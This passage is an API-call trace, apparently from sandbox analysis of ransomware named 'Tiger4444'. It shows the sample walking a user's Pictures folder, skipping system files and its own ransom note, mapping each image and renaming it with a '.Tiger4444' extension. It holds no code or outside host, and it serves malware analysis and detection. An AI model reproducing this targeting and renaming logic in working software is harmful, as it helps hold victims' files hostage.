[0045.649] lstrlenW (lpString=".dll") returned 4 [0045.649] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0045.649] lstrlenW (lpString=".lnk") returned 4 [0045.649] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0045.649] lstrlenW (lpString=".ini") returned 4 [0045.649] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0045.649] lstrlenW (lpString=".sys") returned 4 [0045.649] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0045.649] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\nqh87aP.png" (normalized: "c:\\users\\fd1hvy\\pictures\\nqh87ap.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.649] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.649] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13710194807) returned 1 [0045.649] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=70930) returned 1 [0045.649] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0045.649] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0045.649] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11820, lpName=0x0) returned 0x2c8 [0045.649] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11820) returned 0xbe0000 [0045.650] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.651] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0045.651] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.651] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.651] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.651] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.651] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.651] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0045.651] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13710405079) returned 1 [0045.651] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0045.651] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0045.651] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.652] CloseHandle (hObject=0x2c8) returned 1 [0045.652] CloseHandle (hObject=0x260) returned 1 [0045.654] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\nqh87aP.png.Tiger4444") returned 46 [0045.654] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\nqh87aP.png" (normalized: "c:\\users\\fd1hvy\\pictures\\nqh87ap.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\nqh87aP.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\nqh87ap.png.tiger4444"), dwFlags=0x1) returned 1 [0045.654] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=70944 | out: Addend=0xc6f980) returned 17855232 [0045.654] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4515 [0045.654] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e21dca0, ftCreationTime.dwHighDateTime=0x1d4cffd, ftLastAccessTime.dwLowDateTime=0x9c8af610, ftLastAccessTime.dwHighDateTime=0x1d4ce82, ftLastWriteTime.dwLowDateTime=0x9c8af610, ftLastWriteTime.dwHighDateTime=0x1d4ce82, nFileSizeHigh=0x0, nFileSizeLow=0xf903, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qnFyF6.gif", cAlternateFileName="")) returned 1 [0045.654] lstrcmpiW (lpString1="qnFyF6.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.654] lstrcmpiW (lpString1="qnFyF6.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.654] lstrcmpiW (lpString1="qnFyF6.gif", lpString2="Tiger4444.exe") returned -1 [0045.654] lstrcmpiW (lpString1="qnFyF6.gif", lpString2=".") returned 1 [0045.655] lstrcmpiW (lpString1="qnFyF6.gif", lpString2="..") returned 1 [0045.655] lstrcmpiW (lpString1="qnFyF6.gif", lpString2="windows") returned -1 [0045.655] lstrcmpiW (lpString1="qnFyF6.gif", lpString2="bootmgr") returned 1 [0045.655] lstrcmpiW (lpString1="qnFyF6.gif", lpString2="pagefile.sys") returned 1 [0045.655] lstrcmpiW (lpString1="qnFyF6.gif", lpString2="boot") returned 1 [0045.655] lstrcmpiW (lpString1="qnFyF6.gif", lpString2="ids.txt") returned 1 [0045.655] lstrcmpiW (lpString1="qnFyF6.gif", lpString2="NTUSER.DAT") returned 1 [0045.655] lstrcpyW (in: lpString1=0x30aeada, lpString2="qnFyF6.gif" | out: lpString1="qnFyF6.gif") returned="qnFyF6.gif" [0045.655] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\qnFyF6.gif", dwFileAttributes=0x0) returned 1 [0045.655] lstrlenW (lpString="qnFyF6.gif") returned 10 [0045.655] lstrlenW (lpString="Tiger4444") returned 9 [0045.655] lstrcmpiW (lpString1="nFyF6.gif", lpString2="Tiger4444") returned -1 [0045.655] lstrlenW (lpString=".dll") returned 4 [0045.655] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0045.655] lstrlenW (lpString=".lnk") returned 4 [0045.655] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0045.655] lstrlenW (lpString=".ini") returned 4 [0045.655] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0045.655] lstrlenW (lpString=".sys") returned 4 [0045.655] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0045.655] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\qnFyF6.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\qnfyf6.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.655] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.655] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13710844094) returned 1 [0045.655] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=63747) returned 1 [0045.655] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0045.655] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0045.655] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfc10, lpName=0x0) returned 0x2c8 [0045.656] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfc10) returned 0xbe0000 [0045.657] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.657] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.657] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.657] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.657] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.657] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.657] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.657] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.657] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13711034312) returned 1 [0045.657] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0045.657] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0045.657] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.658] CloseHandle (hObject=0x2c8) returned 1 [0045.658] CloseHandle (hObject=0x260) returned 1 [0045.661] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\qnFyF6.gif.Tiger4444") returned 45 [0045.661] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\qnFyF6.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\qnfyf6.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\qnFyF6.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\qnfyf6.gif.tiger4444"), dwFlags=0x1) returned 1 [0045.661] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=63760 | out: Addend=0xc6f980) returned 17926176 [0045.661] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4517 [0045.661] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3ed68b0, ftCreationTime.dwHighDateTime=0x1d4d4ab, ftLastAccessTime.dwLowDateTime=0xfaf7cb40, ftLastAccessTime.dwHighDateTime=0x1d4d5b4, ftLastWriteTime.dwLowDateTime=0xfaf7cb40, ftLastWriteTime.dwHighDateTime=0x1d4d5b4, nFileSizeHigh=0x0, nFileSizeLow=0x11260, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QYkN2xzet.jpg", cAlternateFileName="QYKN2X~1.JPG")) returned 1 [0045.661] lstrcmpiW (lpString1="QYkN2xzet.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.661] lstrcmpiW (lpString1="QYkN2xzet.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.661] lstrcmpiW (lpString1="QYkN2xzet.jpg", lpString2="Tiger4444.exe") returned -1 [0045.661] lstrcmpiW (lpString1="QYkN2xzet.jpg", lpString2=".") returned 1 [0045.661] lstrcmpiW (lpString1="QYkN2xzet.jpg", lpString2="..") returned 1 [0045.661] lstrcmpiW (lpString1="QYkN2xzet.jpg", lpString2="windows") returned -1 [0045.661] lstrcmpiW (lpString1="QYkN2xzet.jpg", lpString2="bootmgr") returned 1 [0045.661] lstrcmpiW (lpString1="QYkN2xzet.jpg", lpString2="pagefile.sys") returned 1 [0045.661] lstrcmpiW (lpString1="QYkN2xzet.jpg", lpString2="boot") returned 1 [0045.661] lstrcmpiW (lpString1="QYkN2xzet.jpg", lpString2="ids.txt") returned 1 [0045.661] lstrcmpiW (lpString1="QYkN2xzet.jpg", lpString2="NTUSER.DAT") returned 1 [0045.661] lstrcpyW (in: lpString1=0x30aeada, lpString2="QYkN2xzet.jpg" | out: lpString1="QYkN2xzet.jpg") returned="QYkN2xzet.jpg" [0045.661] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\QYkN2xzet.jpg", dwFileAttributes=0x0) returned 1 [0045.662] lstrlenW (lpString="QYkN2xzet.jpg") returned 13 [0045.662] lstrlenW (lpString="Tiger4444") returned 9 [0045.662] lstrcmpiW (lpString1="2xzet.jpg", lpString2="Tiger4444") returned -1 [0045.662] lstrlenW (lpString=".dll") returned 4 [0045.662] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.662] lstrlenW (lpString=".lnk") returned 4 [0045.662] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0045.662] lstrlenW (lpString=".ini") returned 4 [0045.662] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0045.662] lstrlenW (lpString=".sys") returned 4 [0045.662] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0045.662] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\QYkN2xzet.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\qykn2xzet.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.662] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.662] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13711516498) returned 1 [0045.662] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=70240) returned 1 [0045.662] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0045.662] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0045.662] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11560, lpName=0x0) returned 0x2c8 [0045.662] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11560) returned 0xbe0000 [0045.664] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.664] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.664] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.664] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.664] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.664] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.664] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.664] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.664] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13711720576) returned 1 [0045.664] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0045.664] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0045.664] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.665] CloseHandle (hObject=0x2c8) returned 1 [0045.665] CloseHandle (hObject=0x260) returned 1 [0045.667] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\QYkN2xzet.jpg.Tiger4444") returned 48 [0045.667] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\QYkN2xzet.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\qykn2xzet.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\QYkN2xzet.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\qykn2xzet.jpg.tiger4444"), dwFlags=0x1) returned 1 [0045.668] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=70240 | out: Addend=0xc6f980) returned 17989936 [0045.668] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4518 [0045.668] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc83d340, ftCreationTime.dwHighDateTime=0x1d4c62e, ftLastAccessTime.dwLowDateTime=0x53012350, ftLastAccessTime.dwHighDateTime=0x1d4ccfe, ftLastWriteTime.dwLowDateTime=0x53012350, ftLastWriteTime.dwHighDateTime=0x1d4ccfe, nFileSizeHigh=0x0, nFileSizeLow=0x3236, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rL58t9UpNE.png", cAlternateFileName="RL58T9~1.PNG")) returned 1 [0045.668] lstrcmpiW (lpString1="rL58t9UpNE.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.668] lstrcmpiW (lpString1="rL58t9UpNE.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.668] lstrcmpiW (lpString1="rL58t9UpNE.png", lpString2="Tiger4444.exe") returned -1 [0045.668] lstrcmpiW (lpString1="rL58t9UpNE.png", lpString2=".") returned 1 [0045.668] lstrcmpiW (lpString1="rL58t9UpNE.png", lpString2="..") returned 1 [0045.668] lstrcmpiW (lpString1="rL58t9UpNE.png", lpString2="windows") returned -1 [0045.668] lstrcmpiW (lpString1="rL58t9UpNE.png", lpString2="bootmgr") returned 1 [0045.668] lstrcmpiW (lpString1="rL58t9UpNE.png", lpString2="pagefile.sys") returned 1 [0045.668] lstrcmpiW (lpString1="rL58t9UpNE.png", lpString2="boot") returned 1 [0045.668] lstrcmpiW (lpString1="rL58t9UpNE.png", lpString2="ids.txt") returned 1 [0045.668] lstrcmpiW (lpString1="rL58t9UpNE.png", lpString2="NTUSER.DAT") returned 1 [0045.668] lstrcpyW (in: lpString1=0x30aeada, lpString2="rL58t9UpNE.png" | out: lpString1="rL58t9UpNE.png") returned="rL58t9UpNE.png" [0045.668] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\rL58t9UpNE.png", dwFileAttributes=0x0) returned 1 [0045.668] lstrlenW (lpString="rL58t9UpNE.png") returned 14 [0045.668] lstrlenW (lpString="Tiger4444") returned 9 [0045.668] lstrcmpiW (lpString1="9UpNE.png", lpString2="Tiger4444") returned -1 [0045.668] lstrlenW (lpString=".dll") returned 4 [0045.668] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0045.668] lstrlenW (lpString=".lnk") returned 4 [0045.668] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0045.668] lstrlenW (lpString=".ini") returned 4 [0045.668] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0045.668] lstrlenW (lpString=".sys") returned 4 [0045.668] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0045.668] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\rL58t9UpNE.png" (normalized: "c:\\users\\fd1hvy\\pictures\\rl58t9upne.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.669] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.669] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13712170865) returned 1 [0045.669] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=12854) returned 1 [0045.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0045.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0045.669] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3540, lpName=0x0) returned 0x2c8 [0045.669] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3540) returned 0xbe0000 [0045.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0045.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0045.670] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13712284188) returned 1 [0045.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0045.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0045.670] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.670] CloseHandle (hObject=0x2c8) returned 1 [0045.670] CloseHandle (hObject=0x260) returned 1 [0045.672] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\rL58t9UpNE.png.Tiger4444") returned 49 [0045.672] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\rL58t9UpNE.png" (normalized: "c:\\users\\fd1hvy\\pictures\\rl58t9upne.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\rL58t9UpNE.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\rl58t9upne.png.tiger4444"), dwFlags=0x1) returned 1 [0045.673] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=12864 | out: Addend=0xc6f980) returned 18060176 [0045.673] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4520 [0045.673] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0045.673] lstrcmpiW (lpString1="Saved Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.673] lstrcmpiW (lpString1="Saved Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.673] lstrcmpiW (lpString1="Saved Pictures", lpString2="Tiger4444.exe") returned -1 [0045.673] lstrcmpiW (lpString1="Saved Pictures", lpString2=".") returned 1 [0045.673] lstrcmpiW (lpString1="Saved Pictures", lpString2="..") returned 1 [0045.673] lstrcmpiW (lpString1="Saved Pictures", lpString2="windows") returned -1 [0045.673] lstrcmpiW (lpString1="Saved Pictures", lpString2="bootmgr") returned 1 [0045.673] lstrcmpiW (lpString1="Saved Pictures", lpString2="pagefile.sys") returned 1 [0045.673] lstrcmpiW (lpString1="Saved Pictures", lpString2="boot") returned 1 [0045.673] lstrcmpiW (lpString1="Saved Pictures", lpString2="ids.txt") returned 1 [0045.673] lstrcmpiW (lpString1="Saved Pictures", lpString2="NTUSER.DAT") returned 1 [0045.673] lstrcpyW (in: lpString1=0x30aeada, lpString2="Saved Pictures" | out: lpString1="Saved Pictures") returned="Saved Pictures" [0045.673] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", dwFileAttributes=0x10) returned 1 [0045.673] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc663a0 [0045.673] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x50) returned 0xc5e610 [0045.673] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc663a8 | out: ListHead=0xc66828, ListEntry=0xc663a8) returned 0xc5a728 [0045.673] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c7829b0, ftCreationTime.dwHighDateTime=0x1d4c5fd, ftLastAccessTime.dwLowDateTime=0xef3041a0, ftLastAccessTime.dwHighDateTime=0x1d4cbc5, ftLastWriteTime.dwLowDateTime=0xef3041a0, ftLastWriteTime.dwHighDateTime=0x1d4cbc5, nFileSizeHigh=0x0, nFileSizeLow=0x8f98, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sg1EYYvYbFWAigsa.bmp", cAlternateFileName="SG1EYY~1.BMP")) returned 1 [0045.673] lstrcmpiW (lpString1="sg1EYYvYbFWAigsa.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.673] lstrcmpiW (lpString1="sg1EYYvYbFWAigsa.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.673] lstrcmpiW (lpString1="sg1EYYvYbFWAigsa.bmp", lpString2="Tiger4444.exe") returned -1 [0045.673] lstrcmpiW (lpString1="sg1EYYvYbFWAigsa.bmp", lpString2=".") returned 1 [0045.673] lstrcmpiW (lpString1="sg1EYYvYbFWAigsa.bmp", lpString2="..") returned 1 [0045.674] lstrcmpiW (lpString1="sg1EYYvYbFWAigsa.bmp", lpString2="windows") returned -1 [0045.674] lstrcmpiW (lpString1="sg1EYYvYbFWAigsa.bmp", lpString2="bootmgr") returned 1 [0045.674] lstrcmpiW (lpString1="sg1EYYvYbFWAigsa.bmp", lpString2="pagefile.sys") returned 1 [0045.674] lstrcmpiW (lpString1="sg1EYYvYbFWAigsa.bmp", lpString2="boot") returned 1 [0045.674] lstrcmpiW (lpString1="sg1EYYvYbFWAigsa.bmp", lpString2="ids.txt") returned 1 [0045.674] lstrcmpiW (lpString1="sg1EYYvYbFWAigsa.bmp", lpString2="NTUSER.DAT") returned 1 [0045.674] lstrcpyW (in: lpString1=0x30aeada, lpString2="sg1EYYvYbFWAigsa.bmp" | out: lpString1="sg1EYYvYbFWAigsa.bmp") returned="sg1EYYvYbFWAigsa.bmp" [0045.674] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\sg1EYYvYbFWAigsa.bmp", dwFileAttributes=0x0) returned 1 [0045.674] lstrlenW (lpString="sg1EYYvYbFWAigsa.bmp") returned 20 [0045.674] lstrlenW (lpString="Tiger4444") returned 9 [0045.674] lstrcmpiW (lpString1="Aigsa.bmp", lpString2="Tiger4444") returned -1 [0045.674] lstrlenW (lpString=".dll") returned 4 [0045.674] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0045.674] lstrlenW (lpString=".lnk") returned 4 [0045.674] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0045.674] lstrlenW (lpString=".ini") returned 4 [0045.674] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0045.674] lstrlenW (lpString=".sys") returned 4 [0045.674] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0045.674] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\sg1EYYvYbFWAigsa.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sg1eyyvybfwaigsa.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.674] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.674] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13712755433) returned 1 [0045.674] GetFileSizeEx 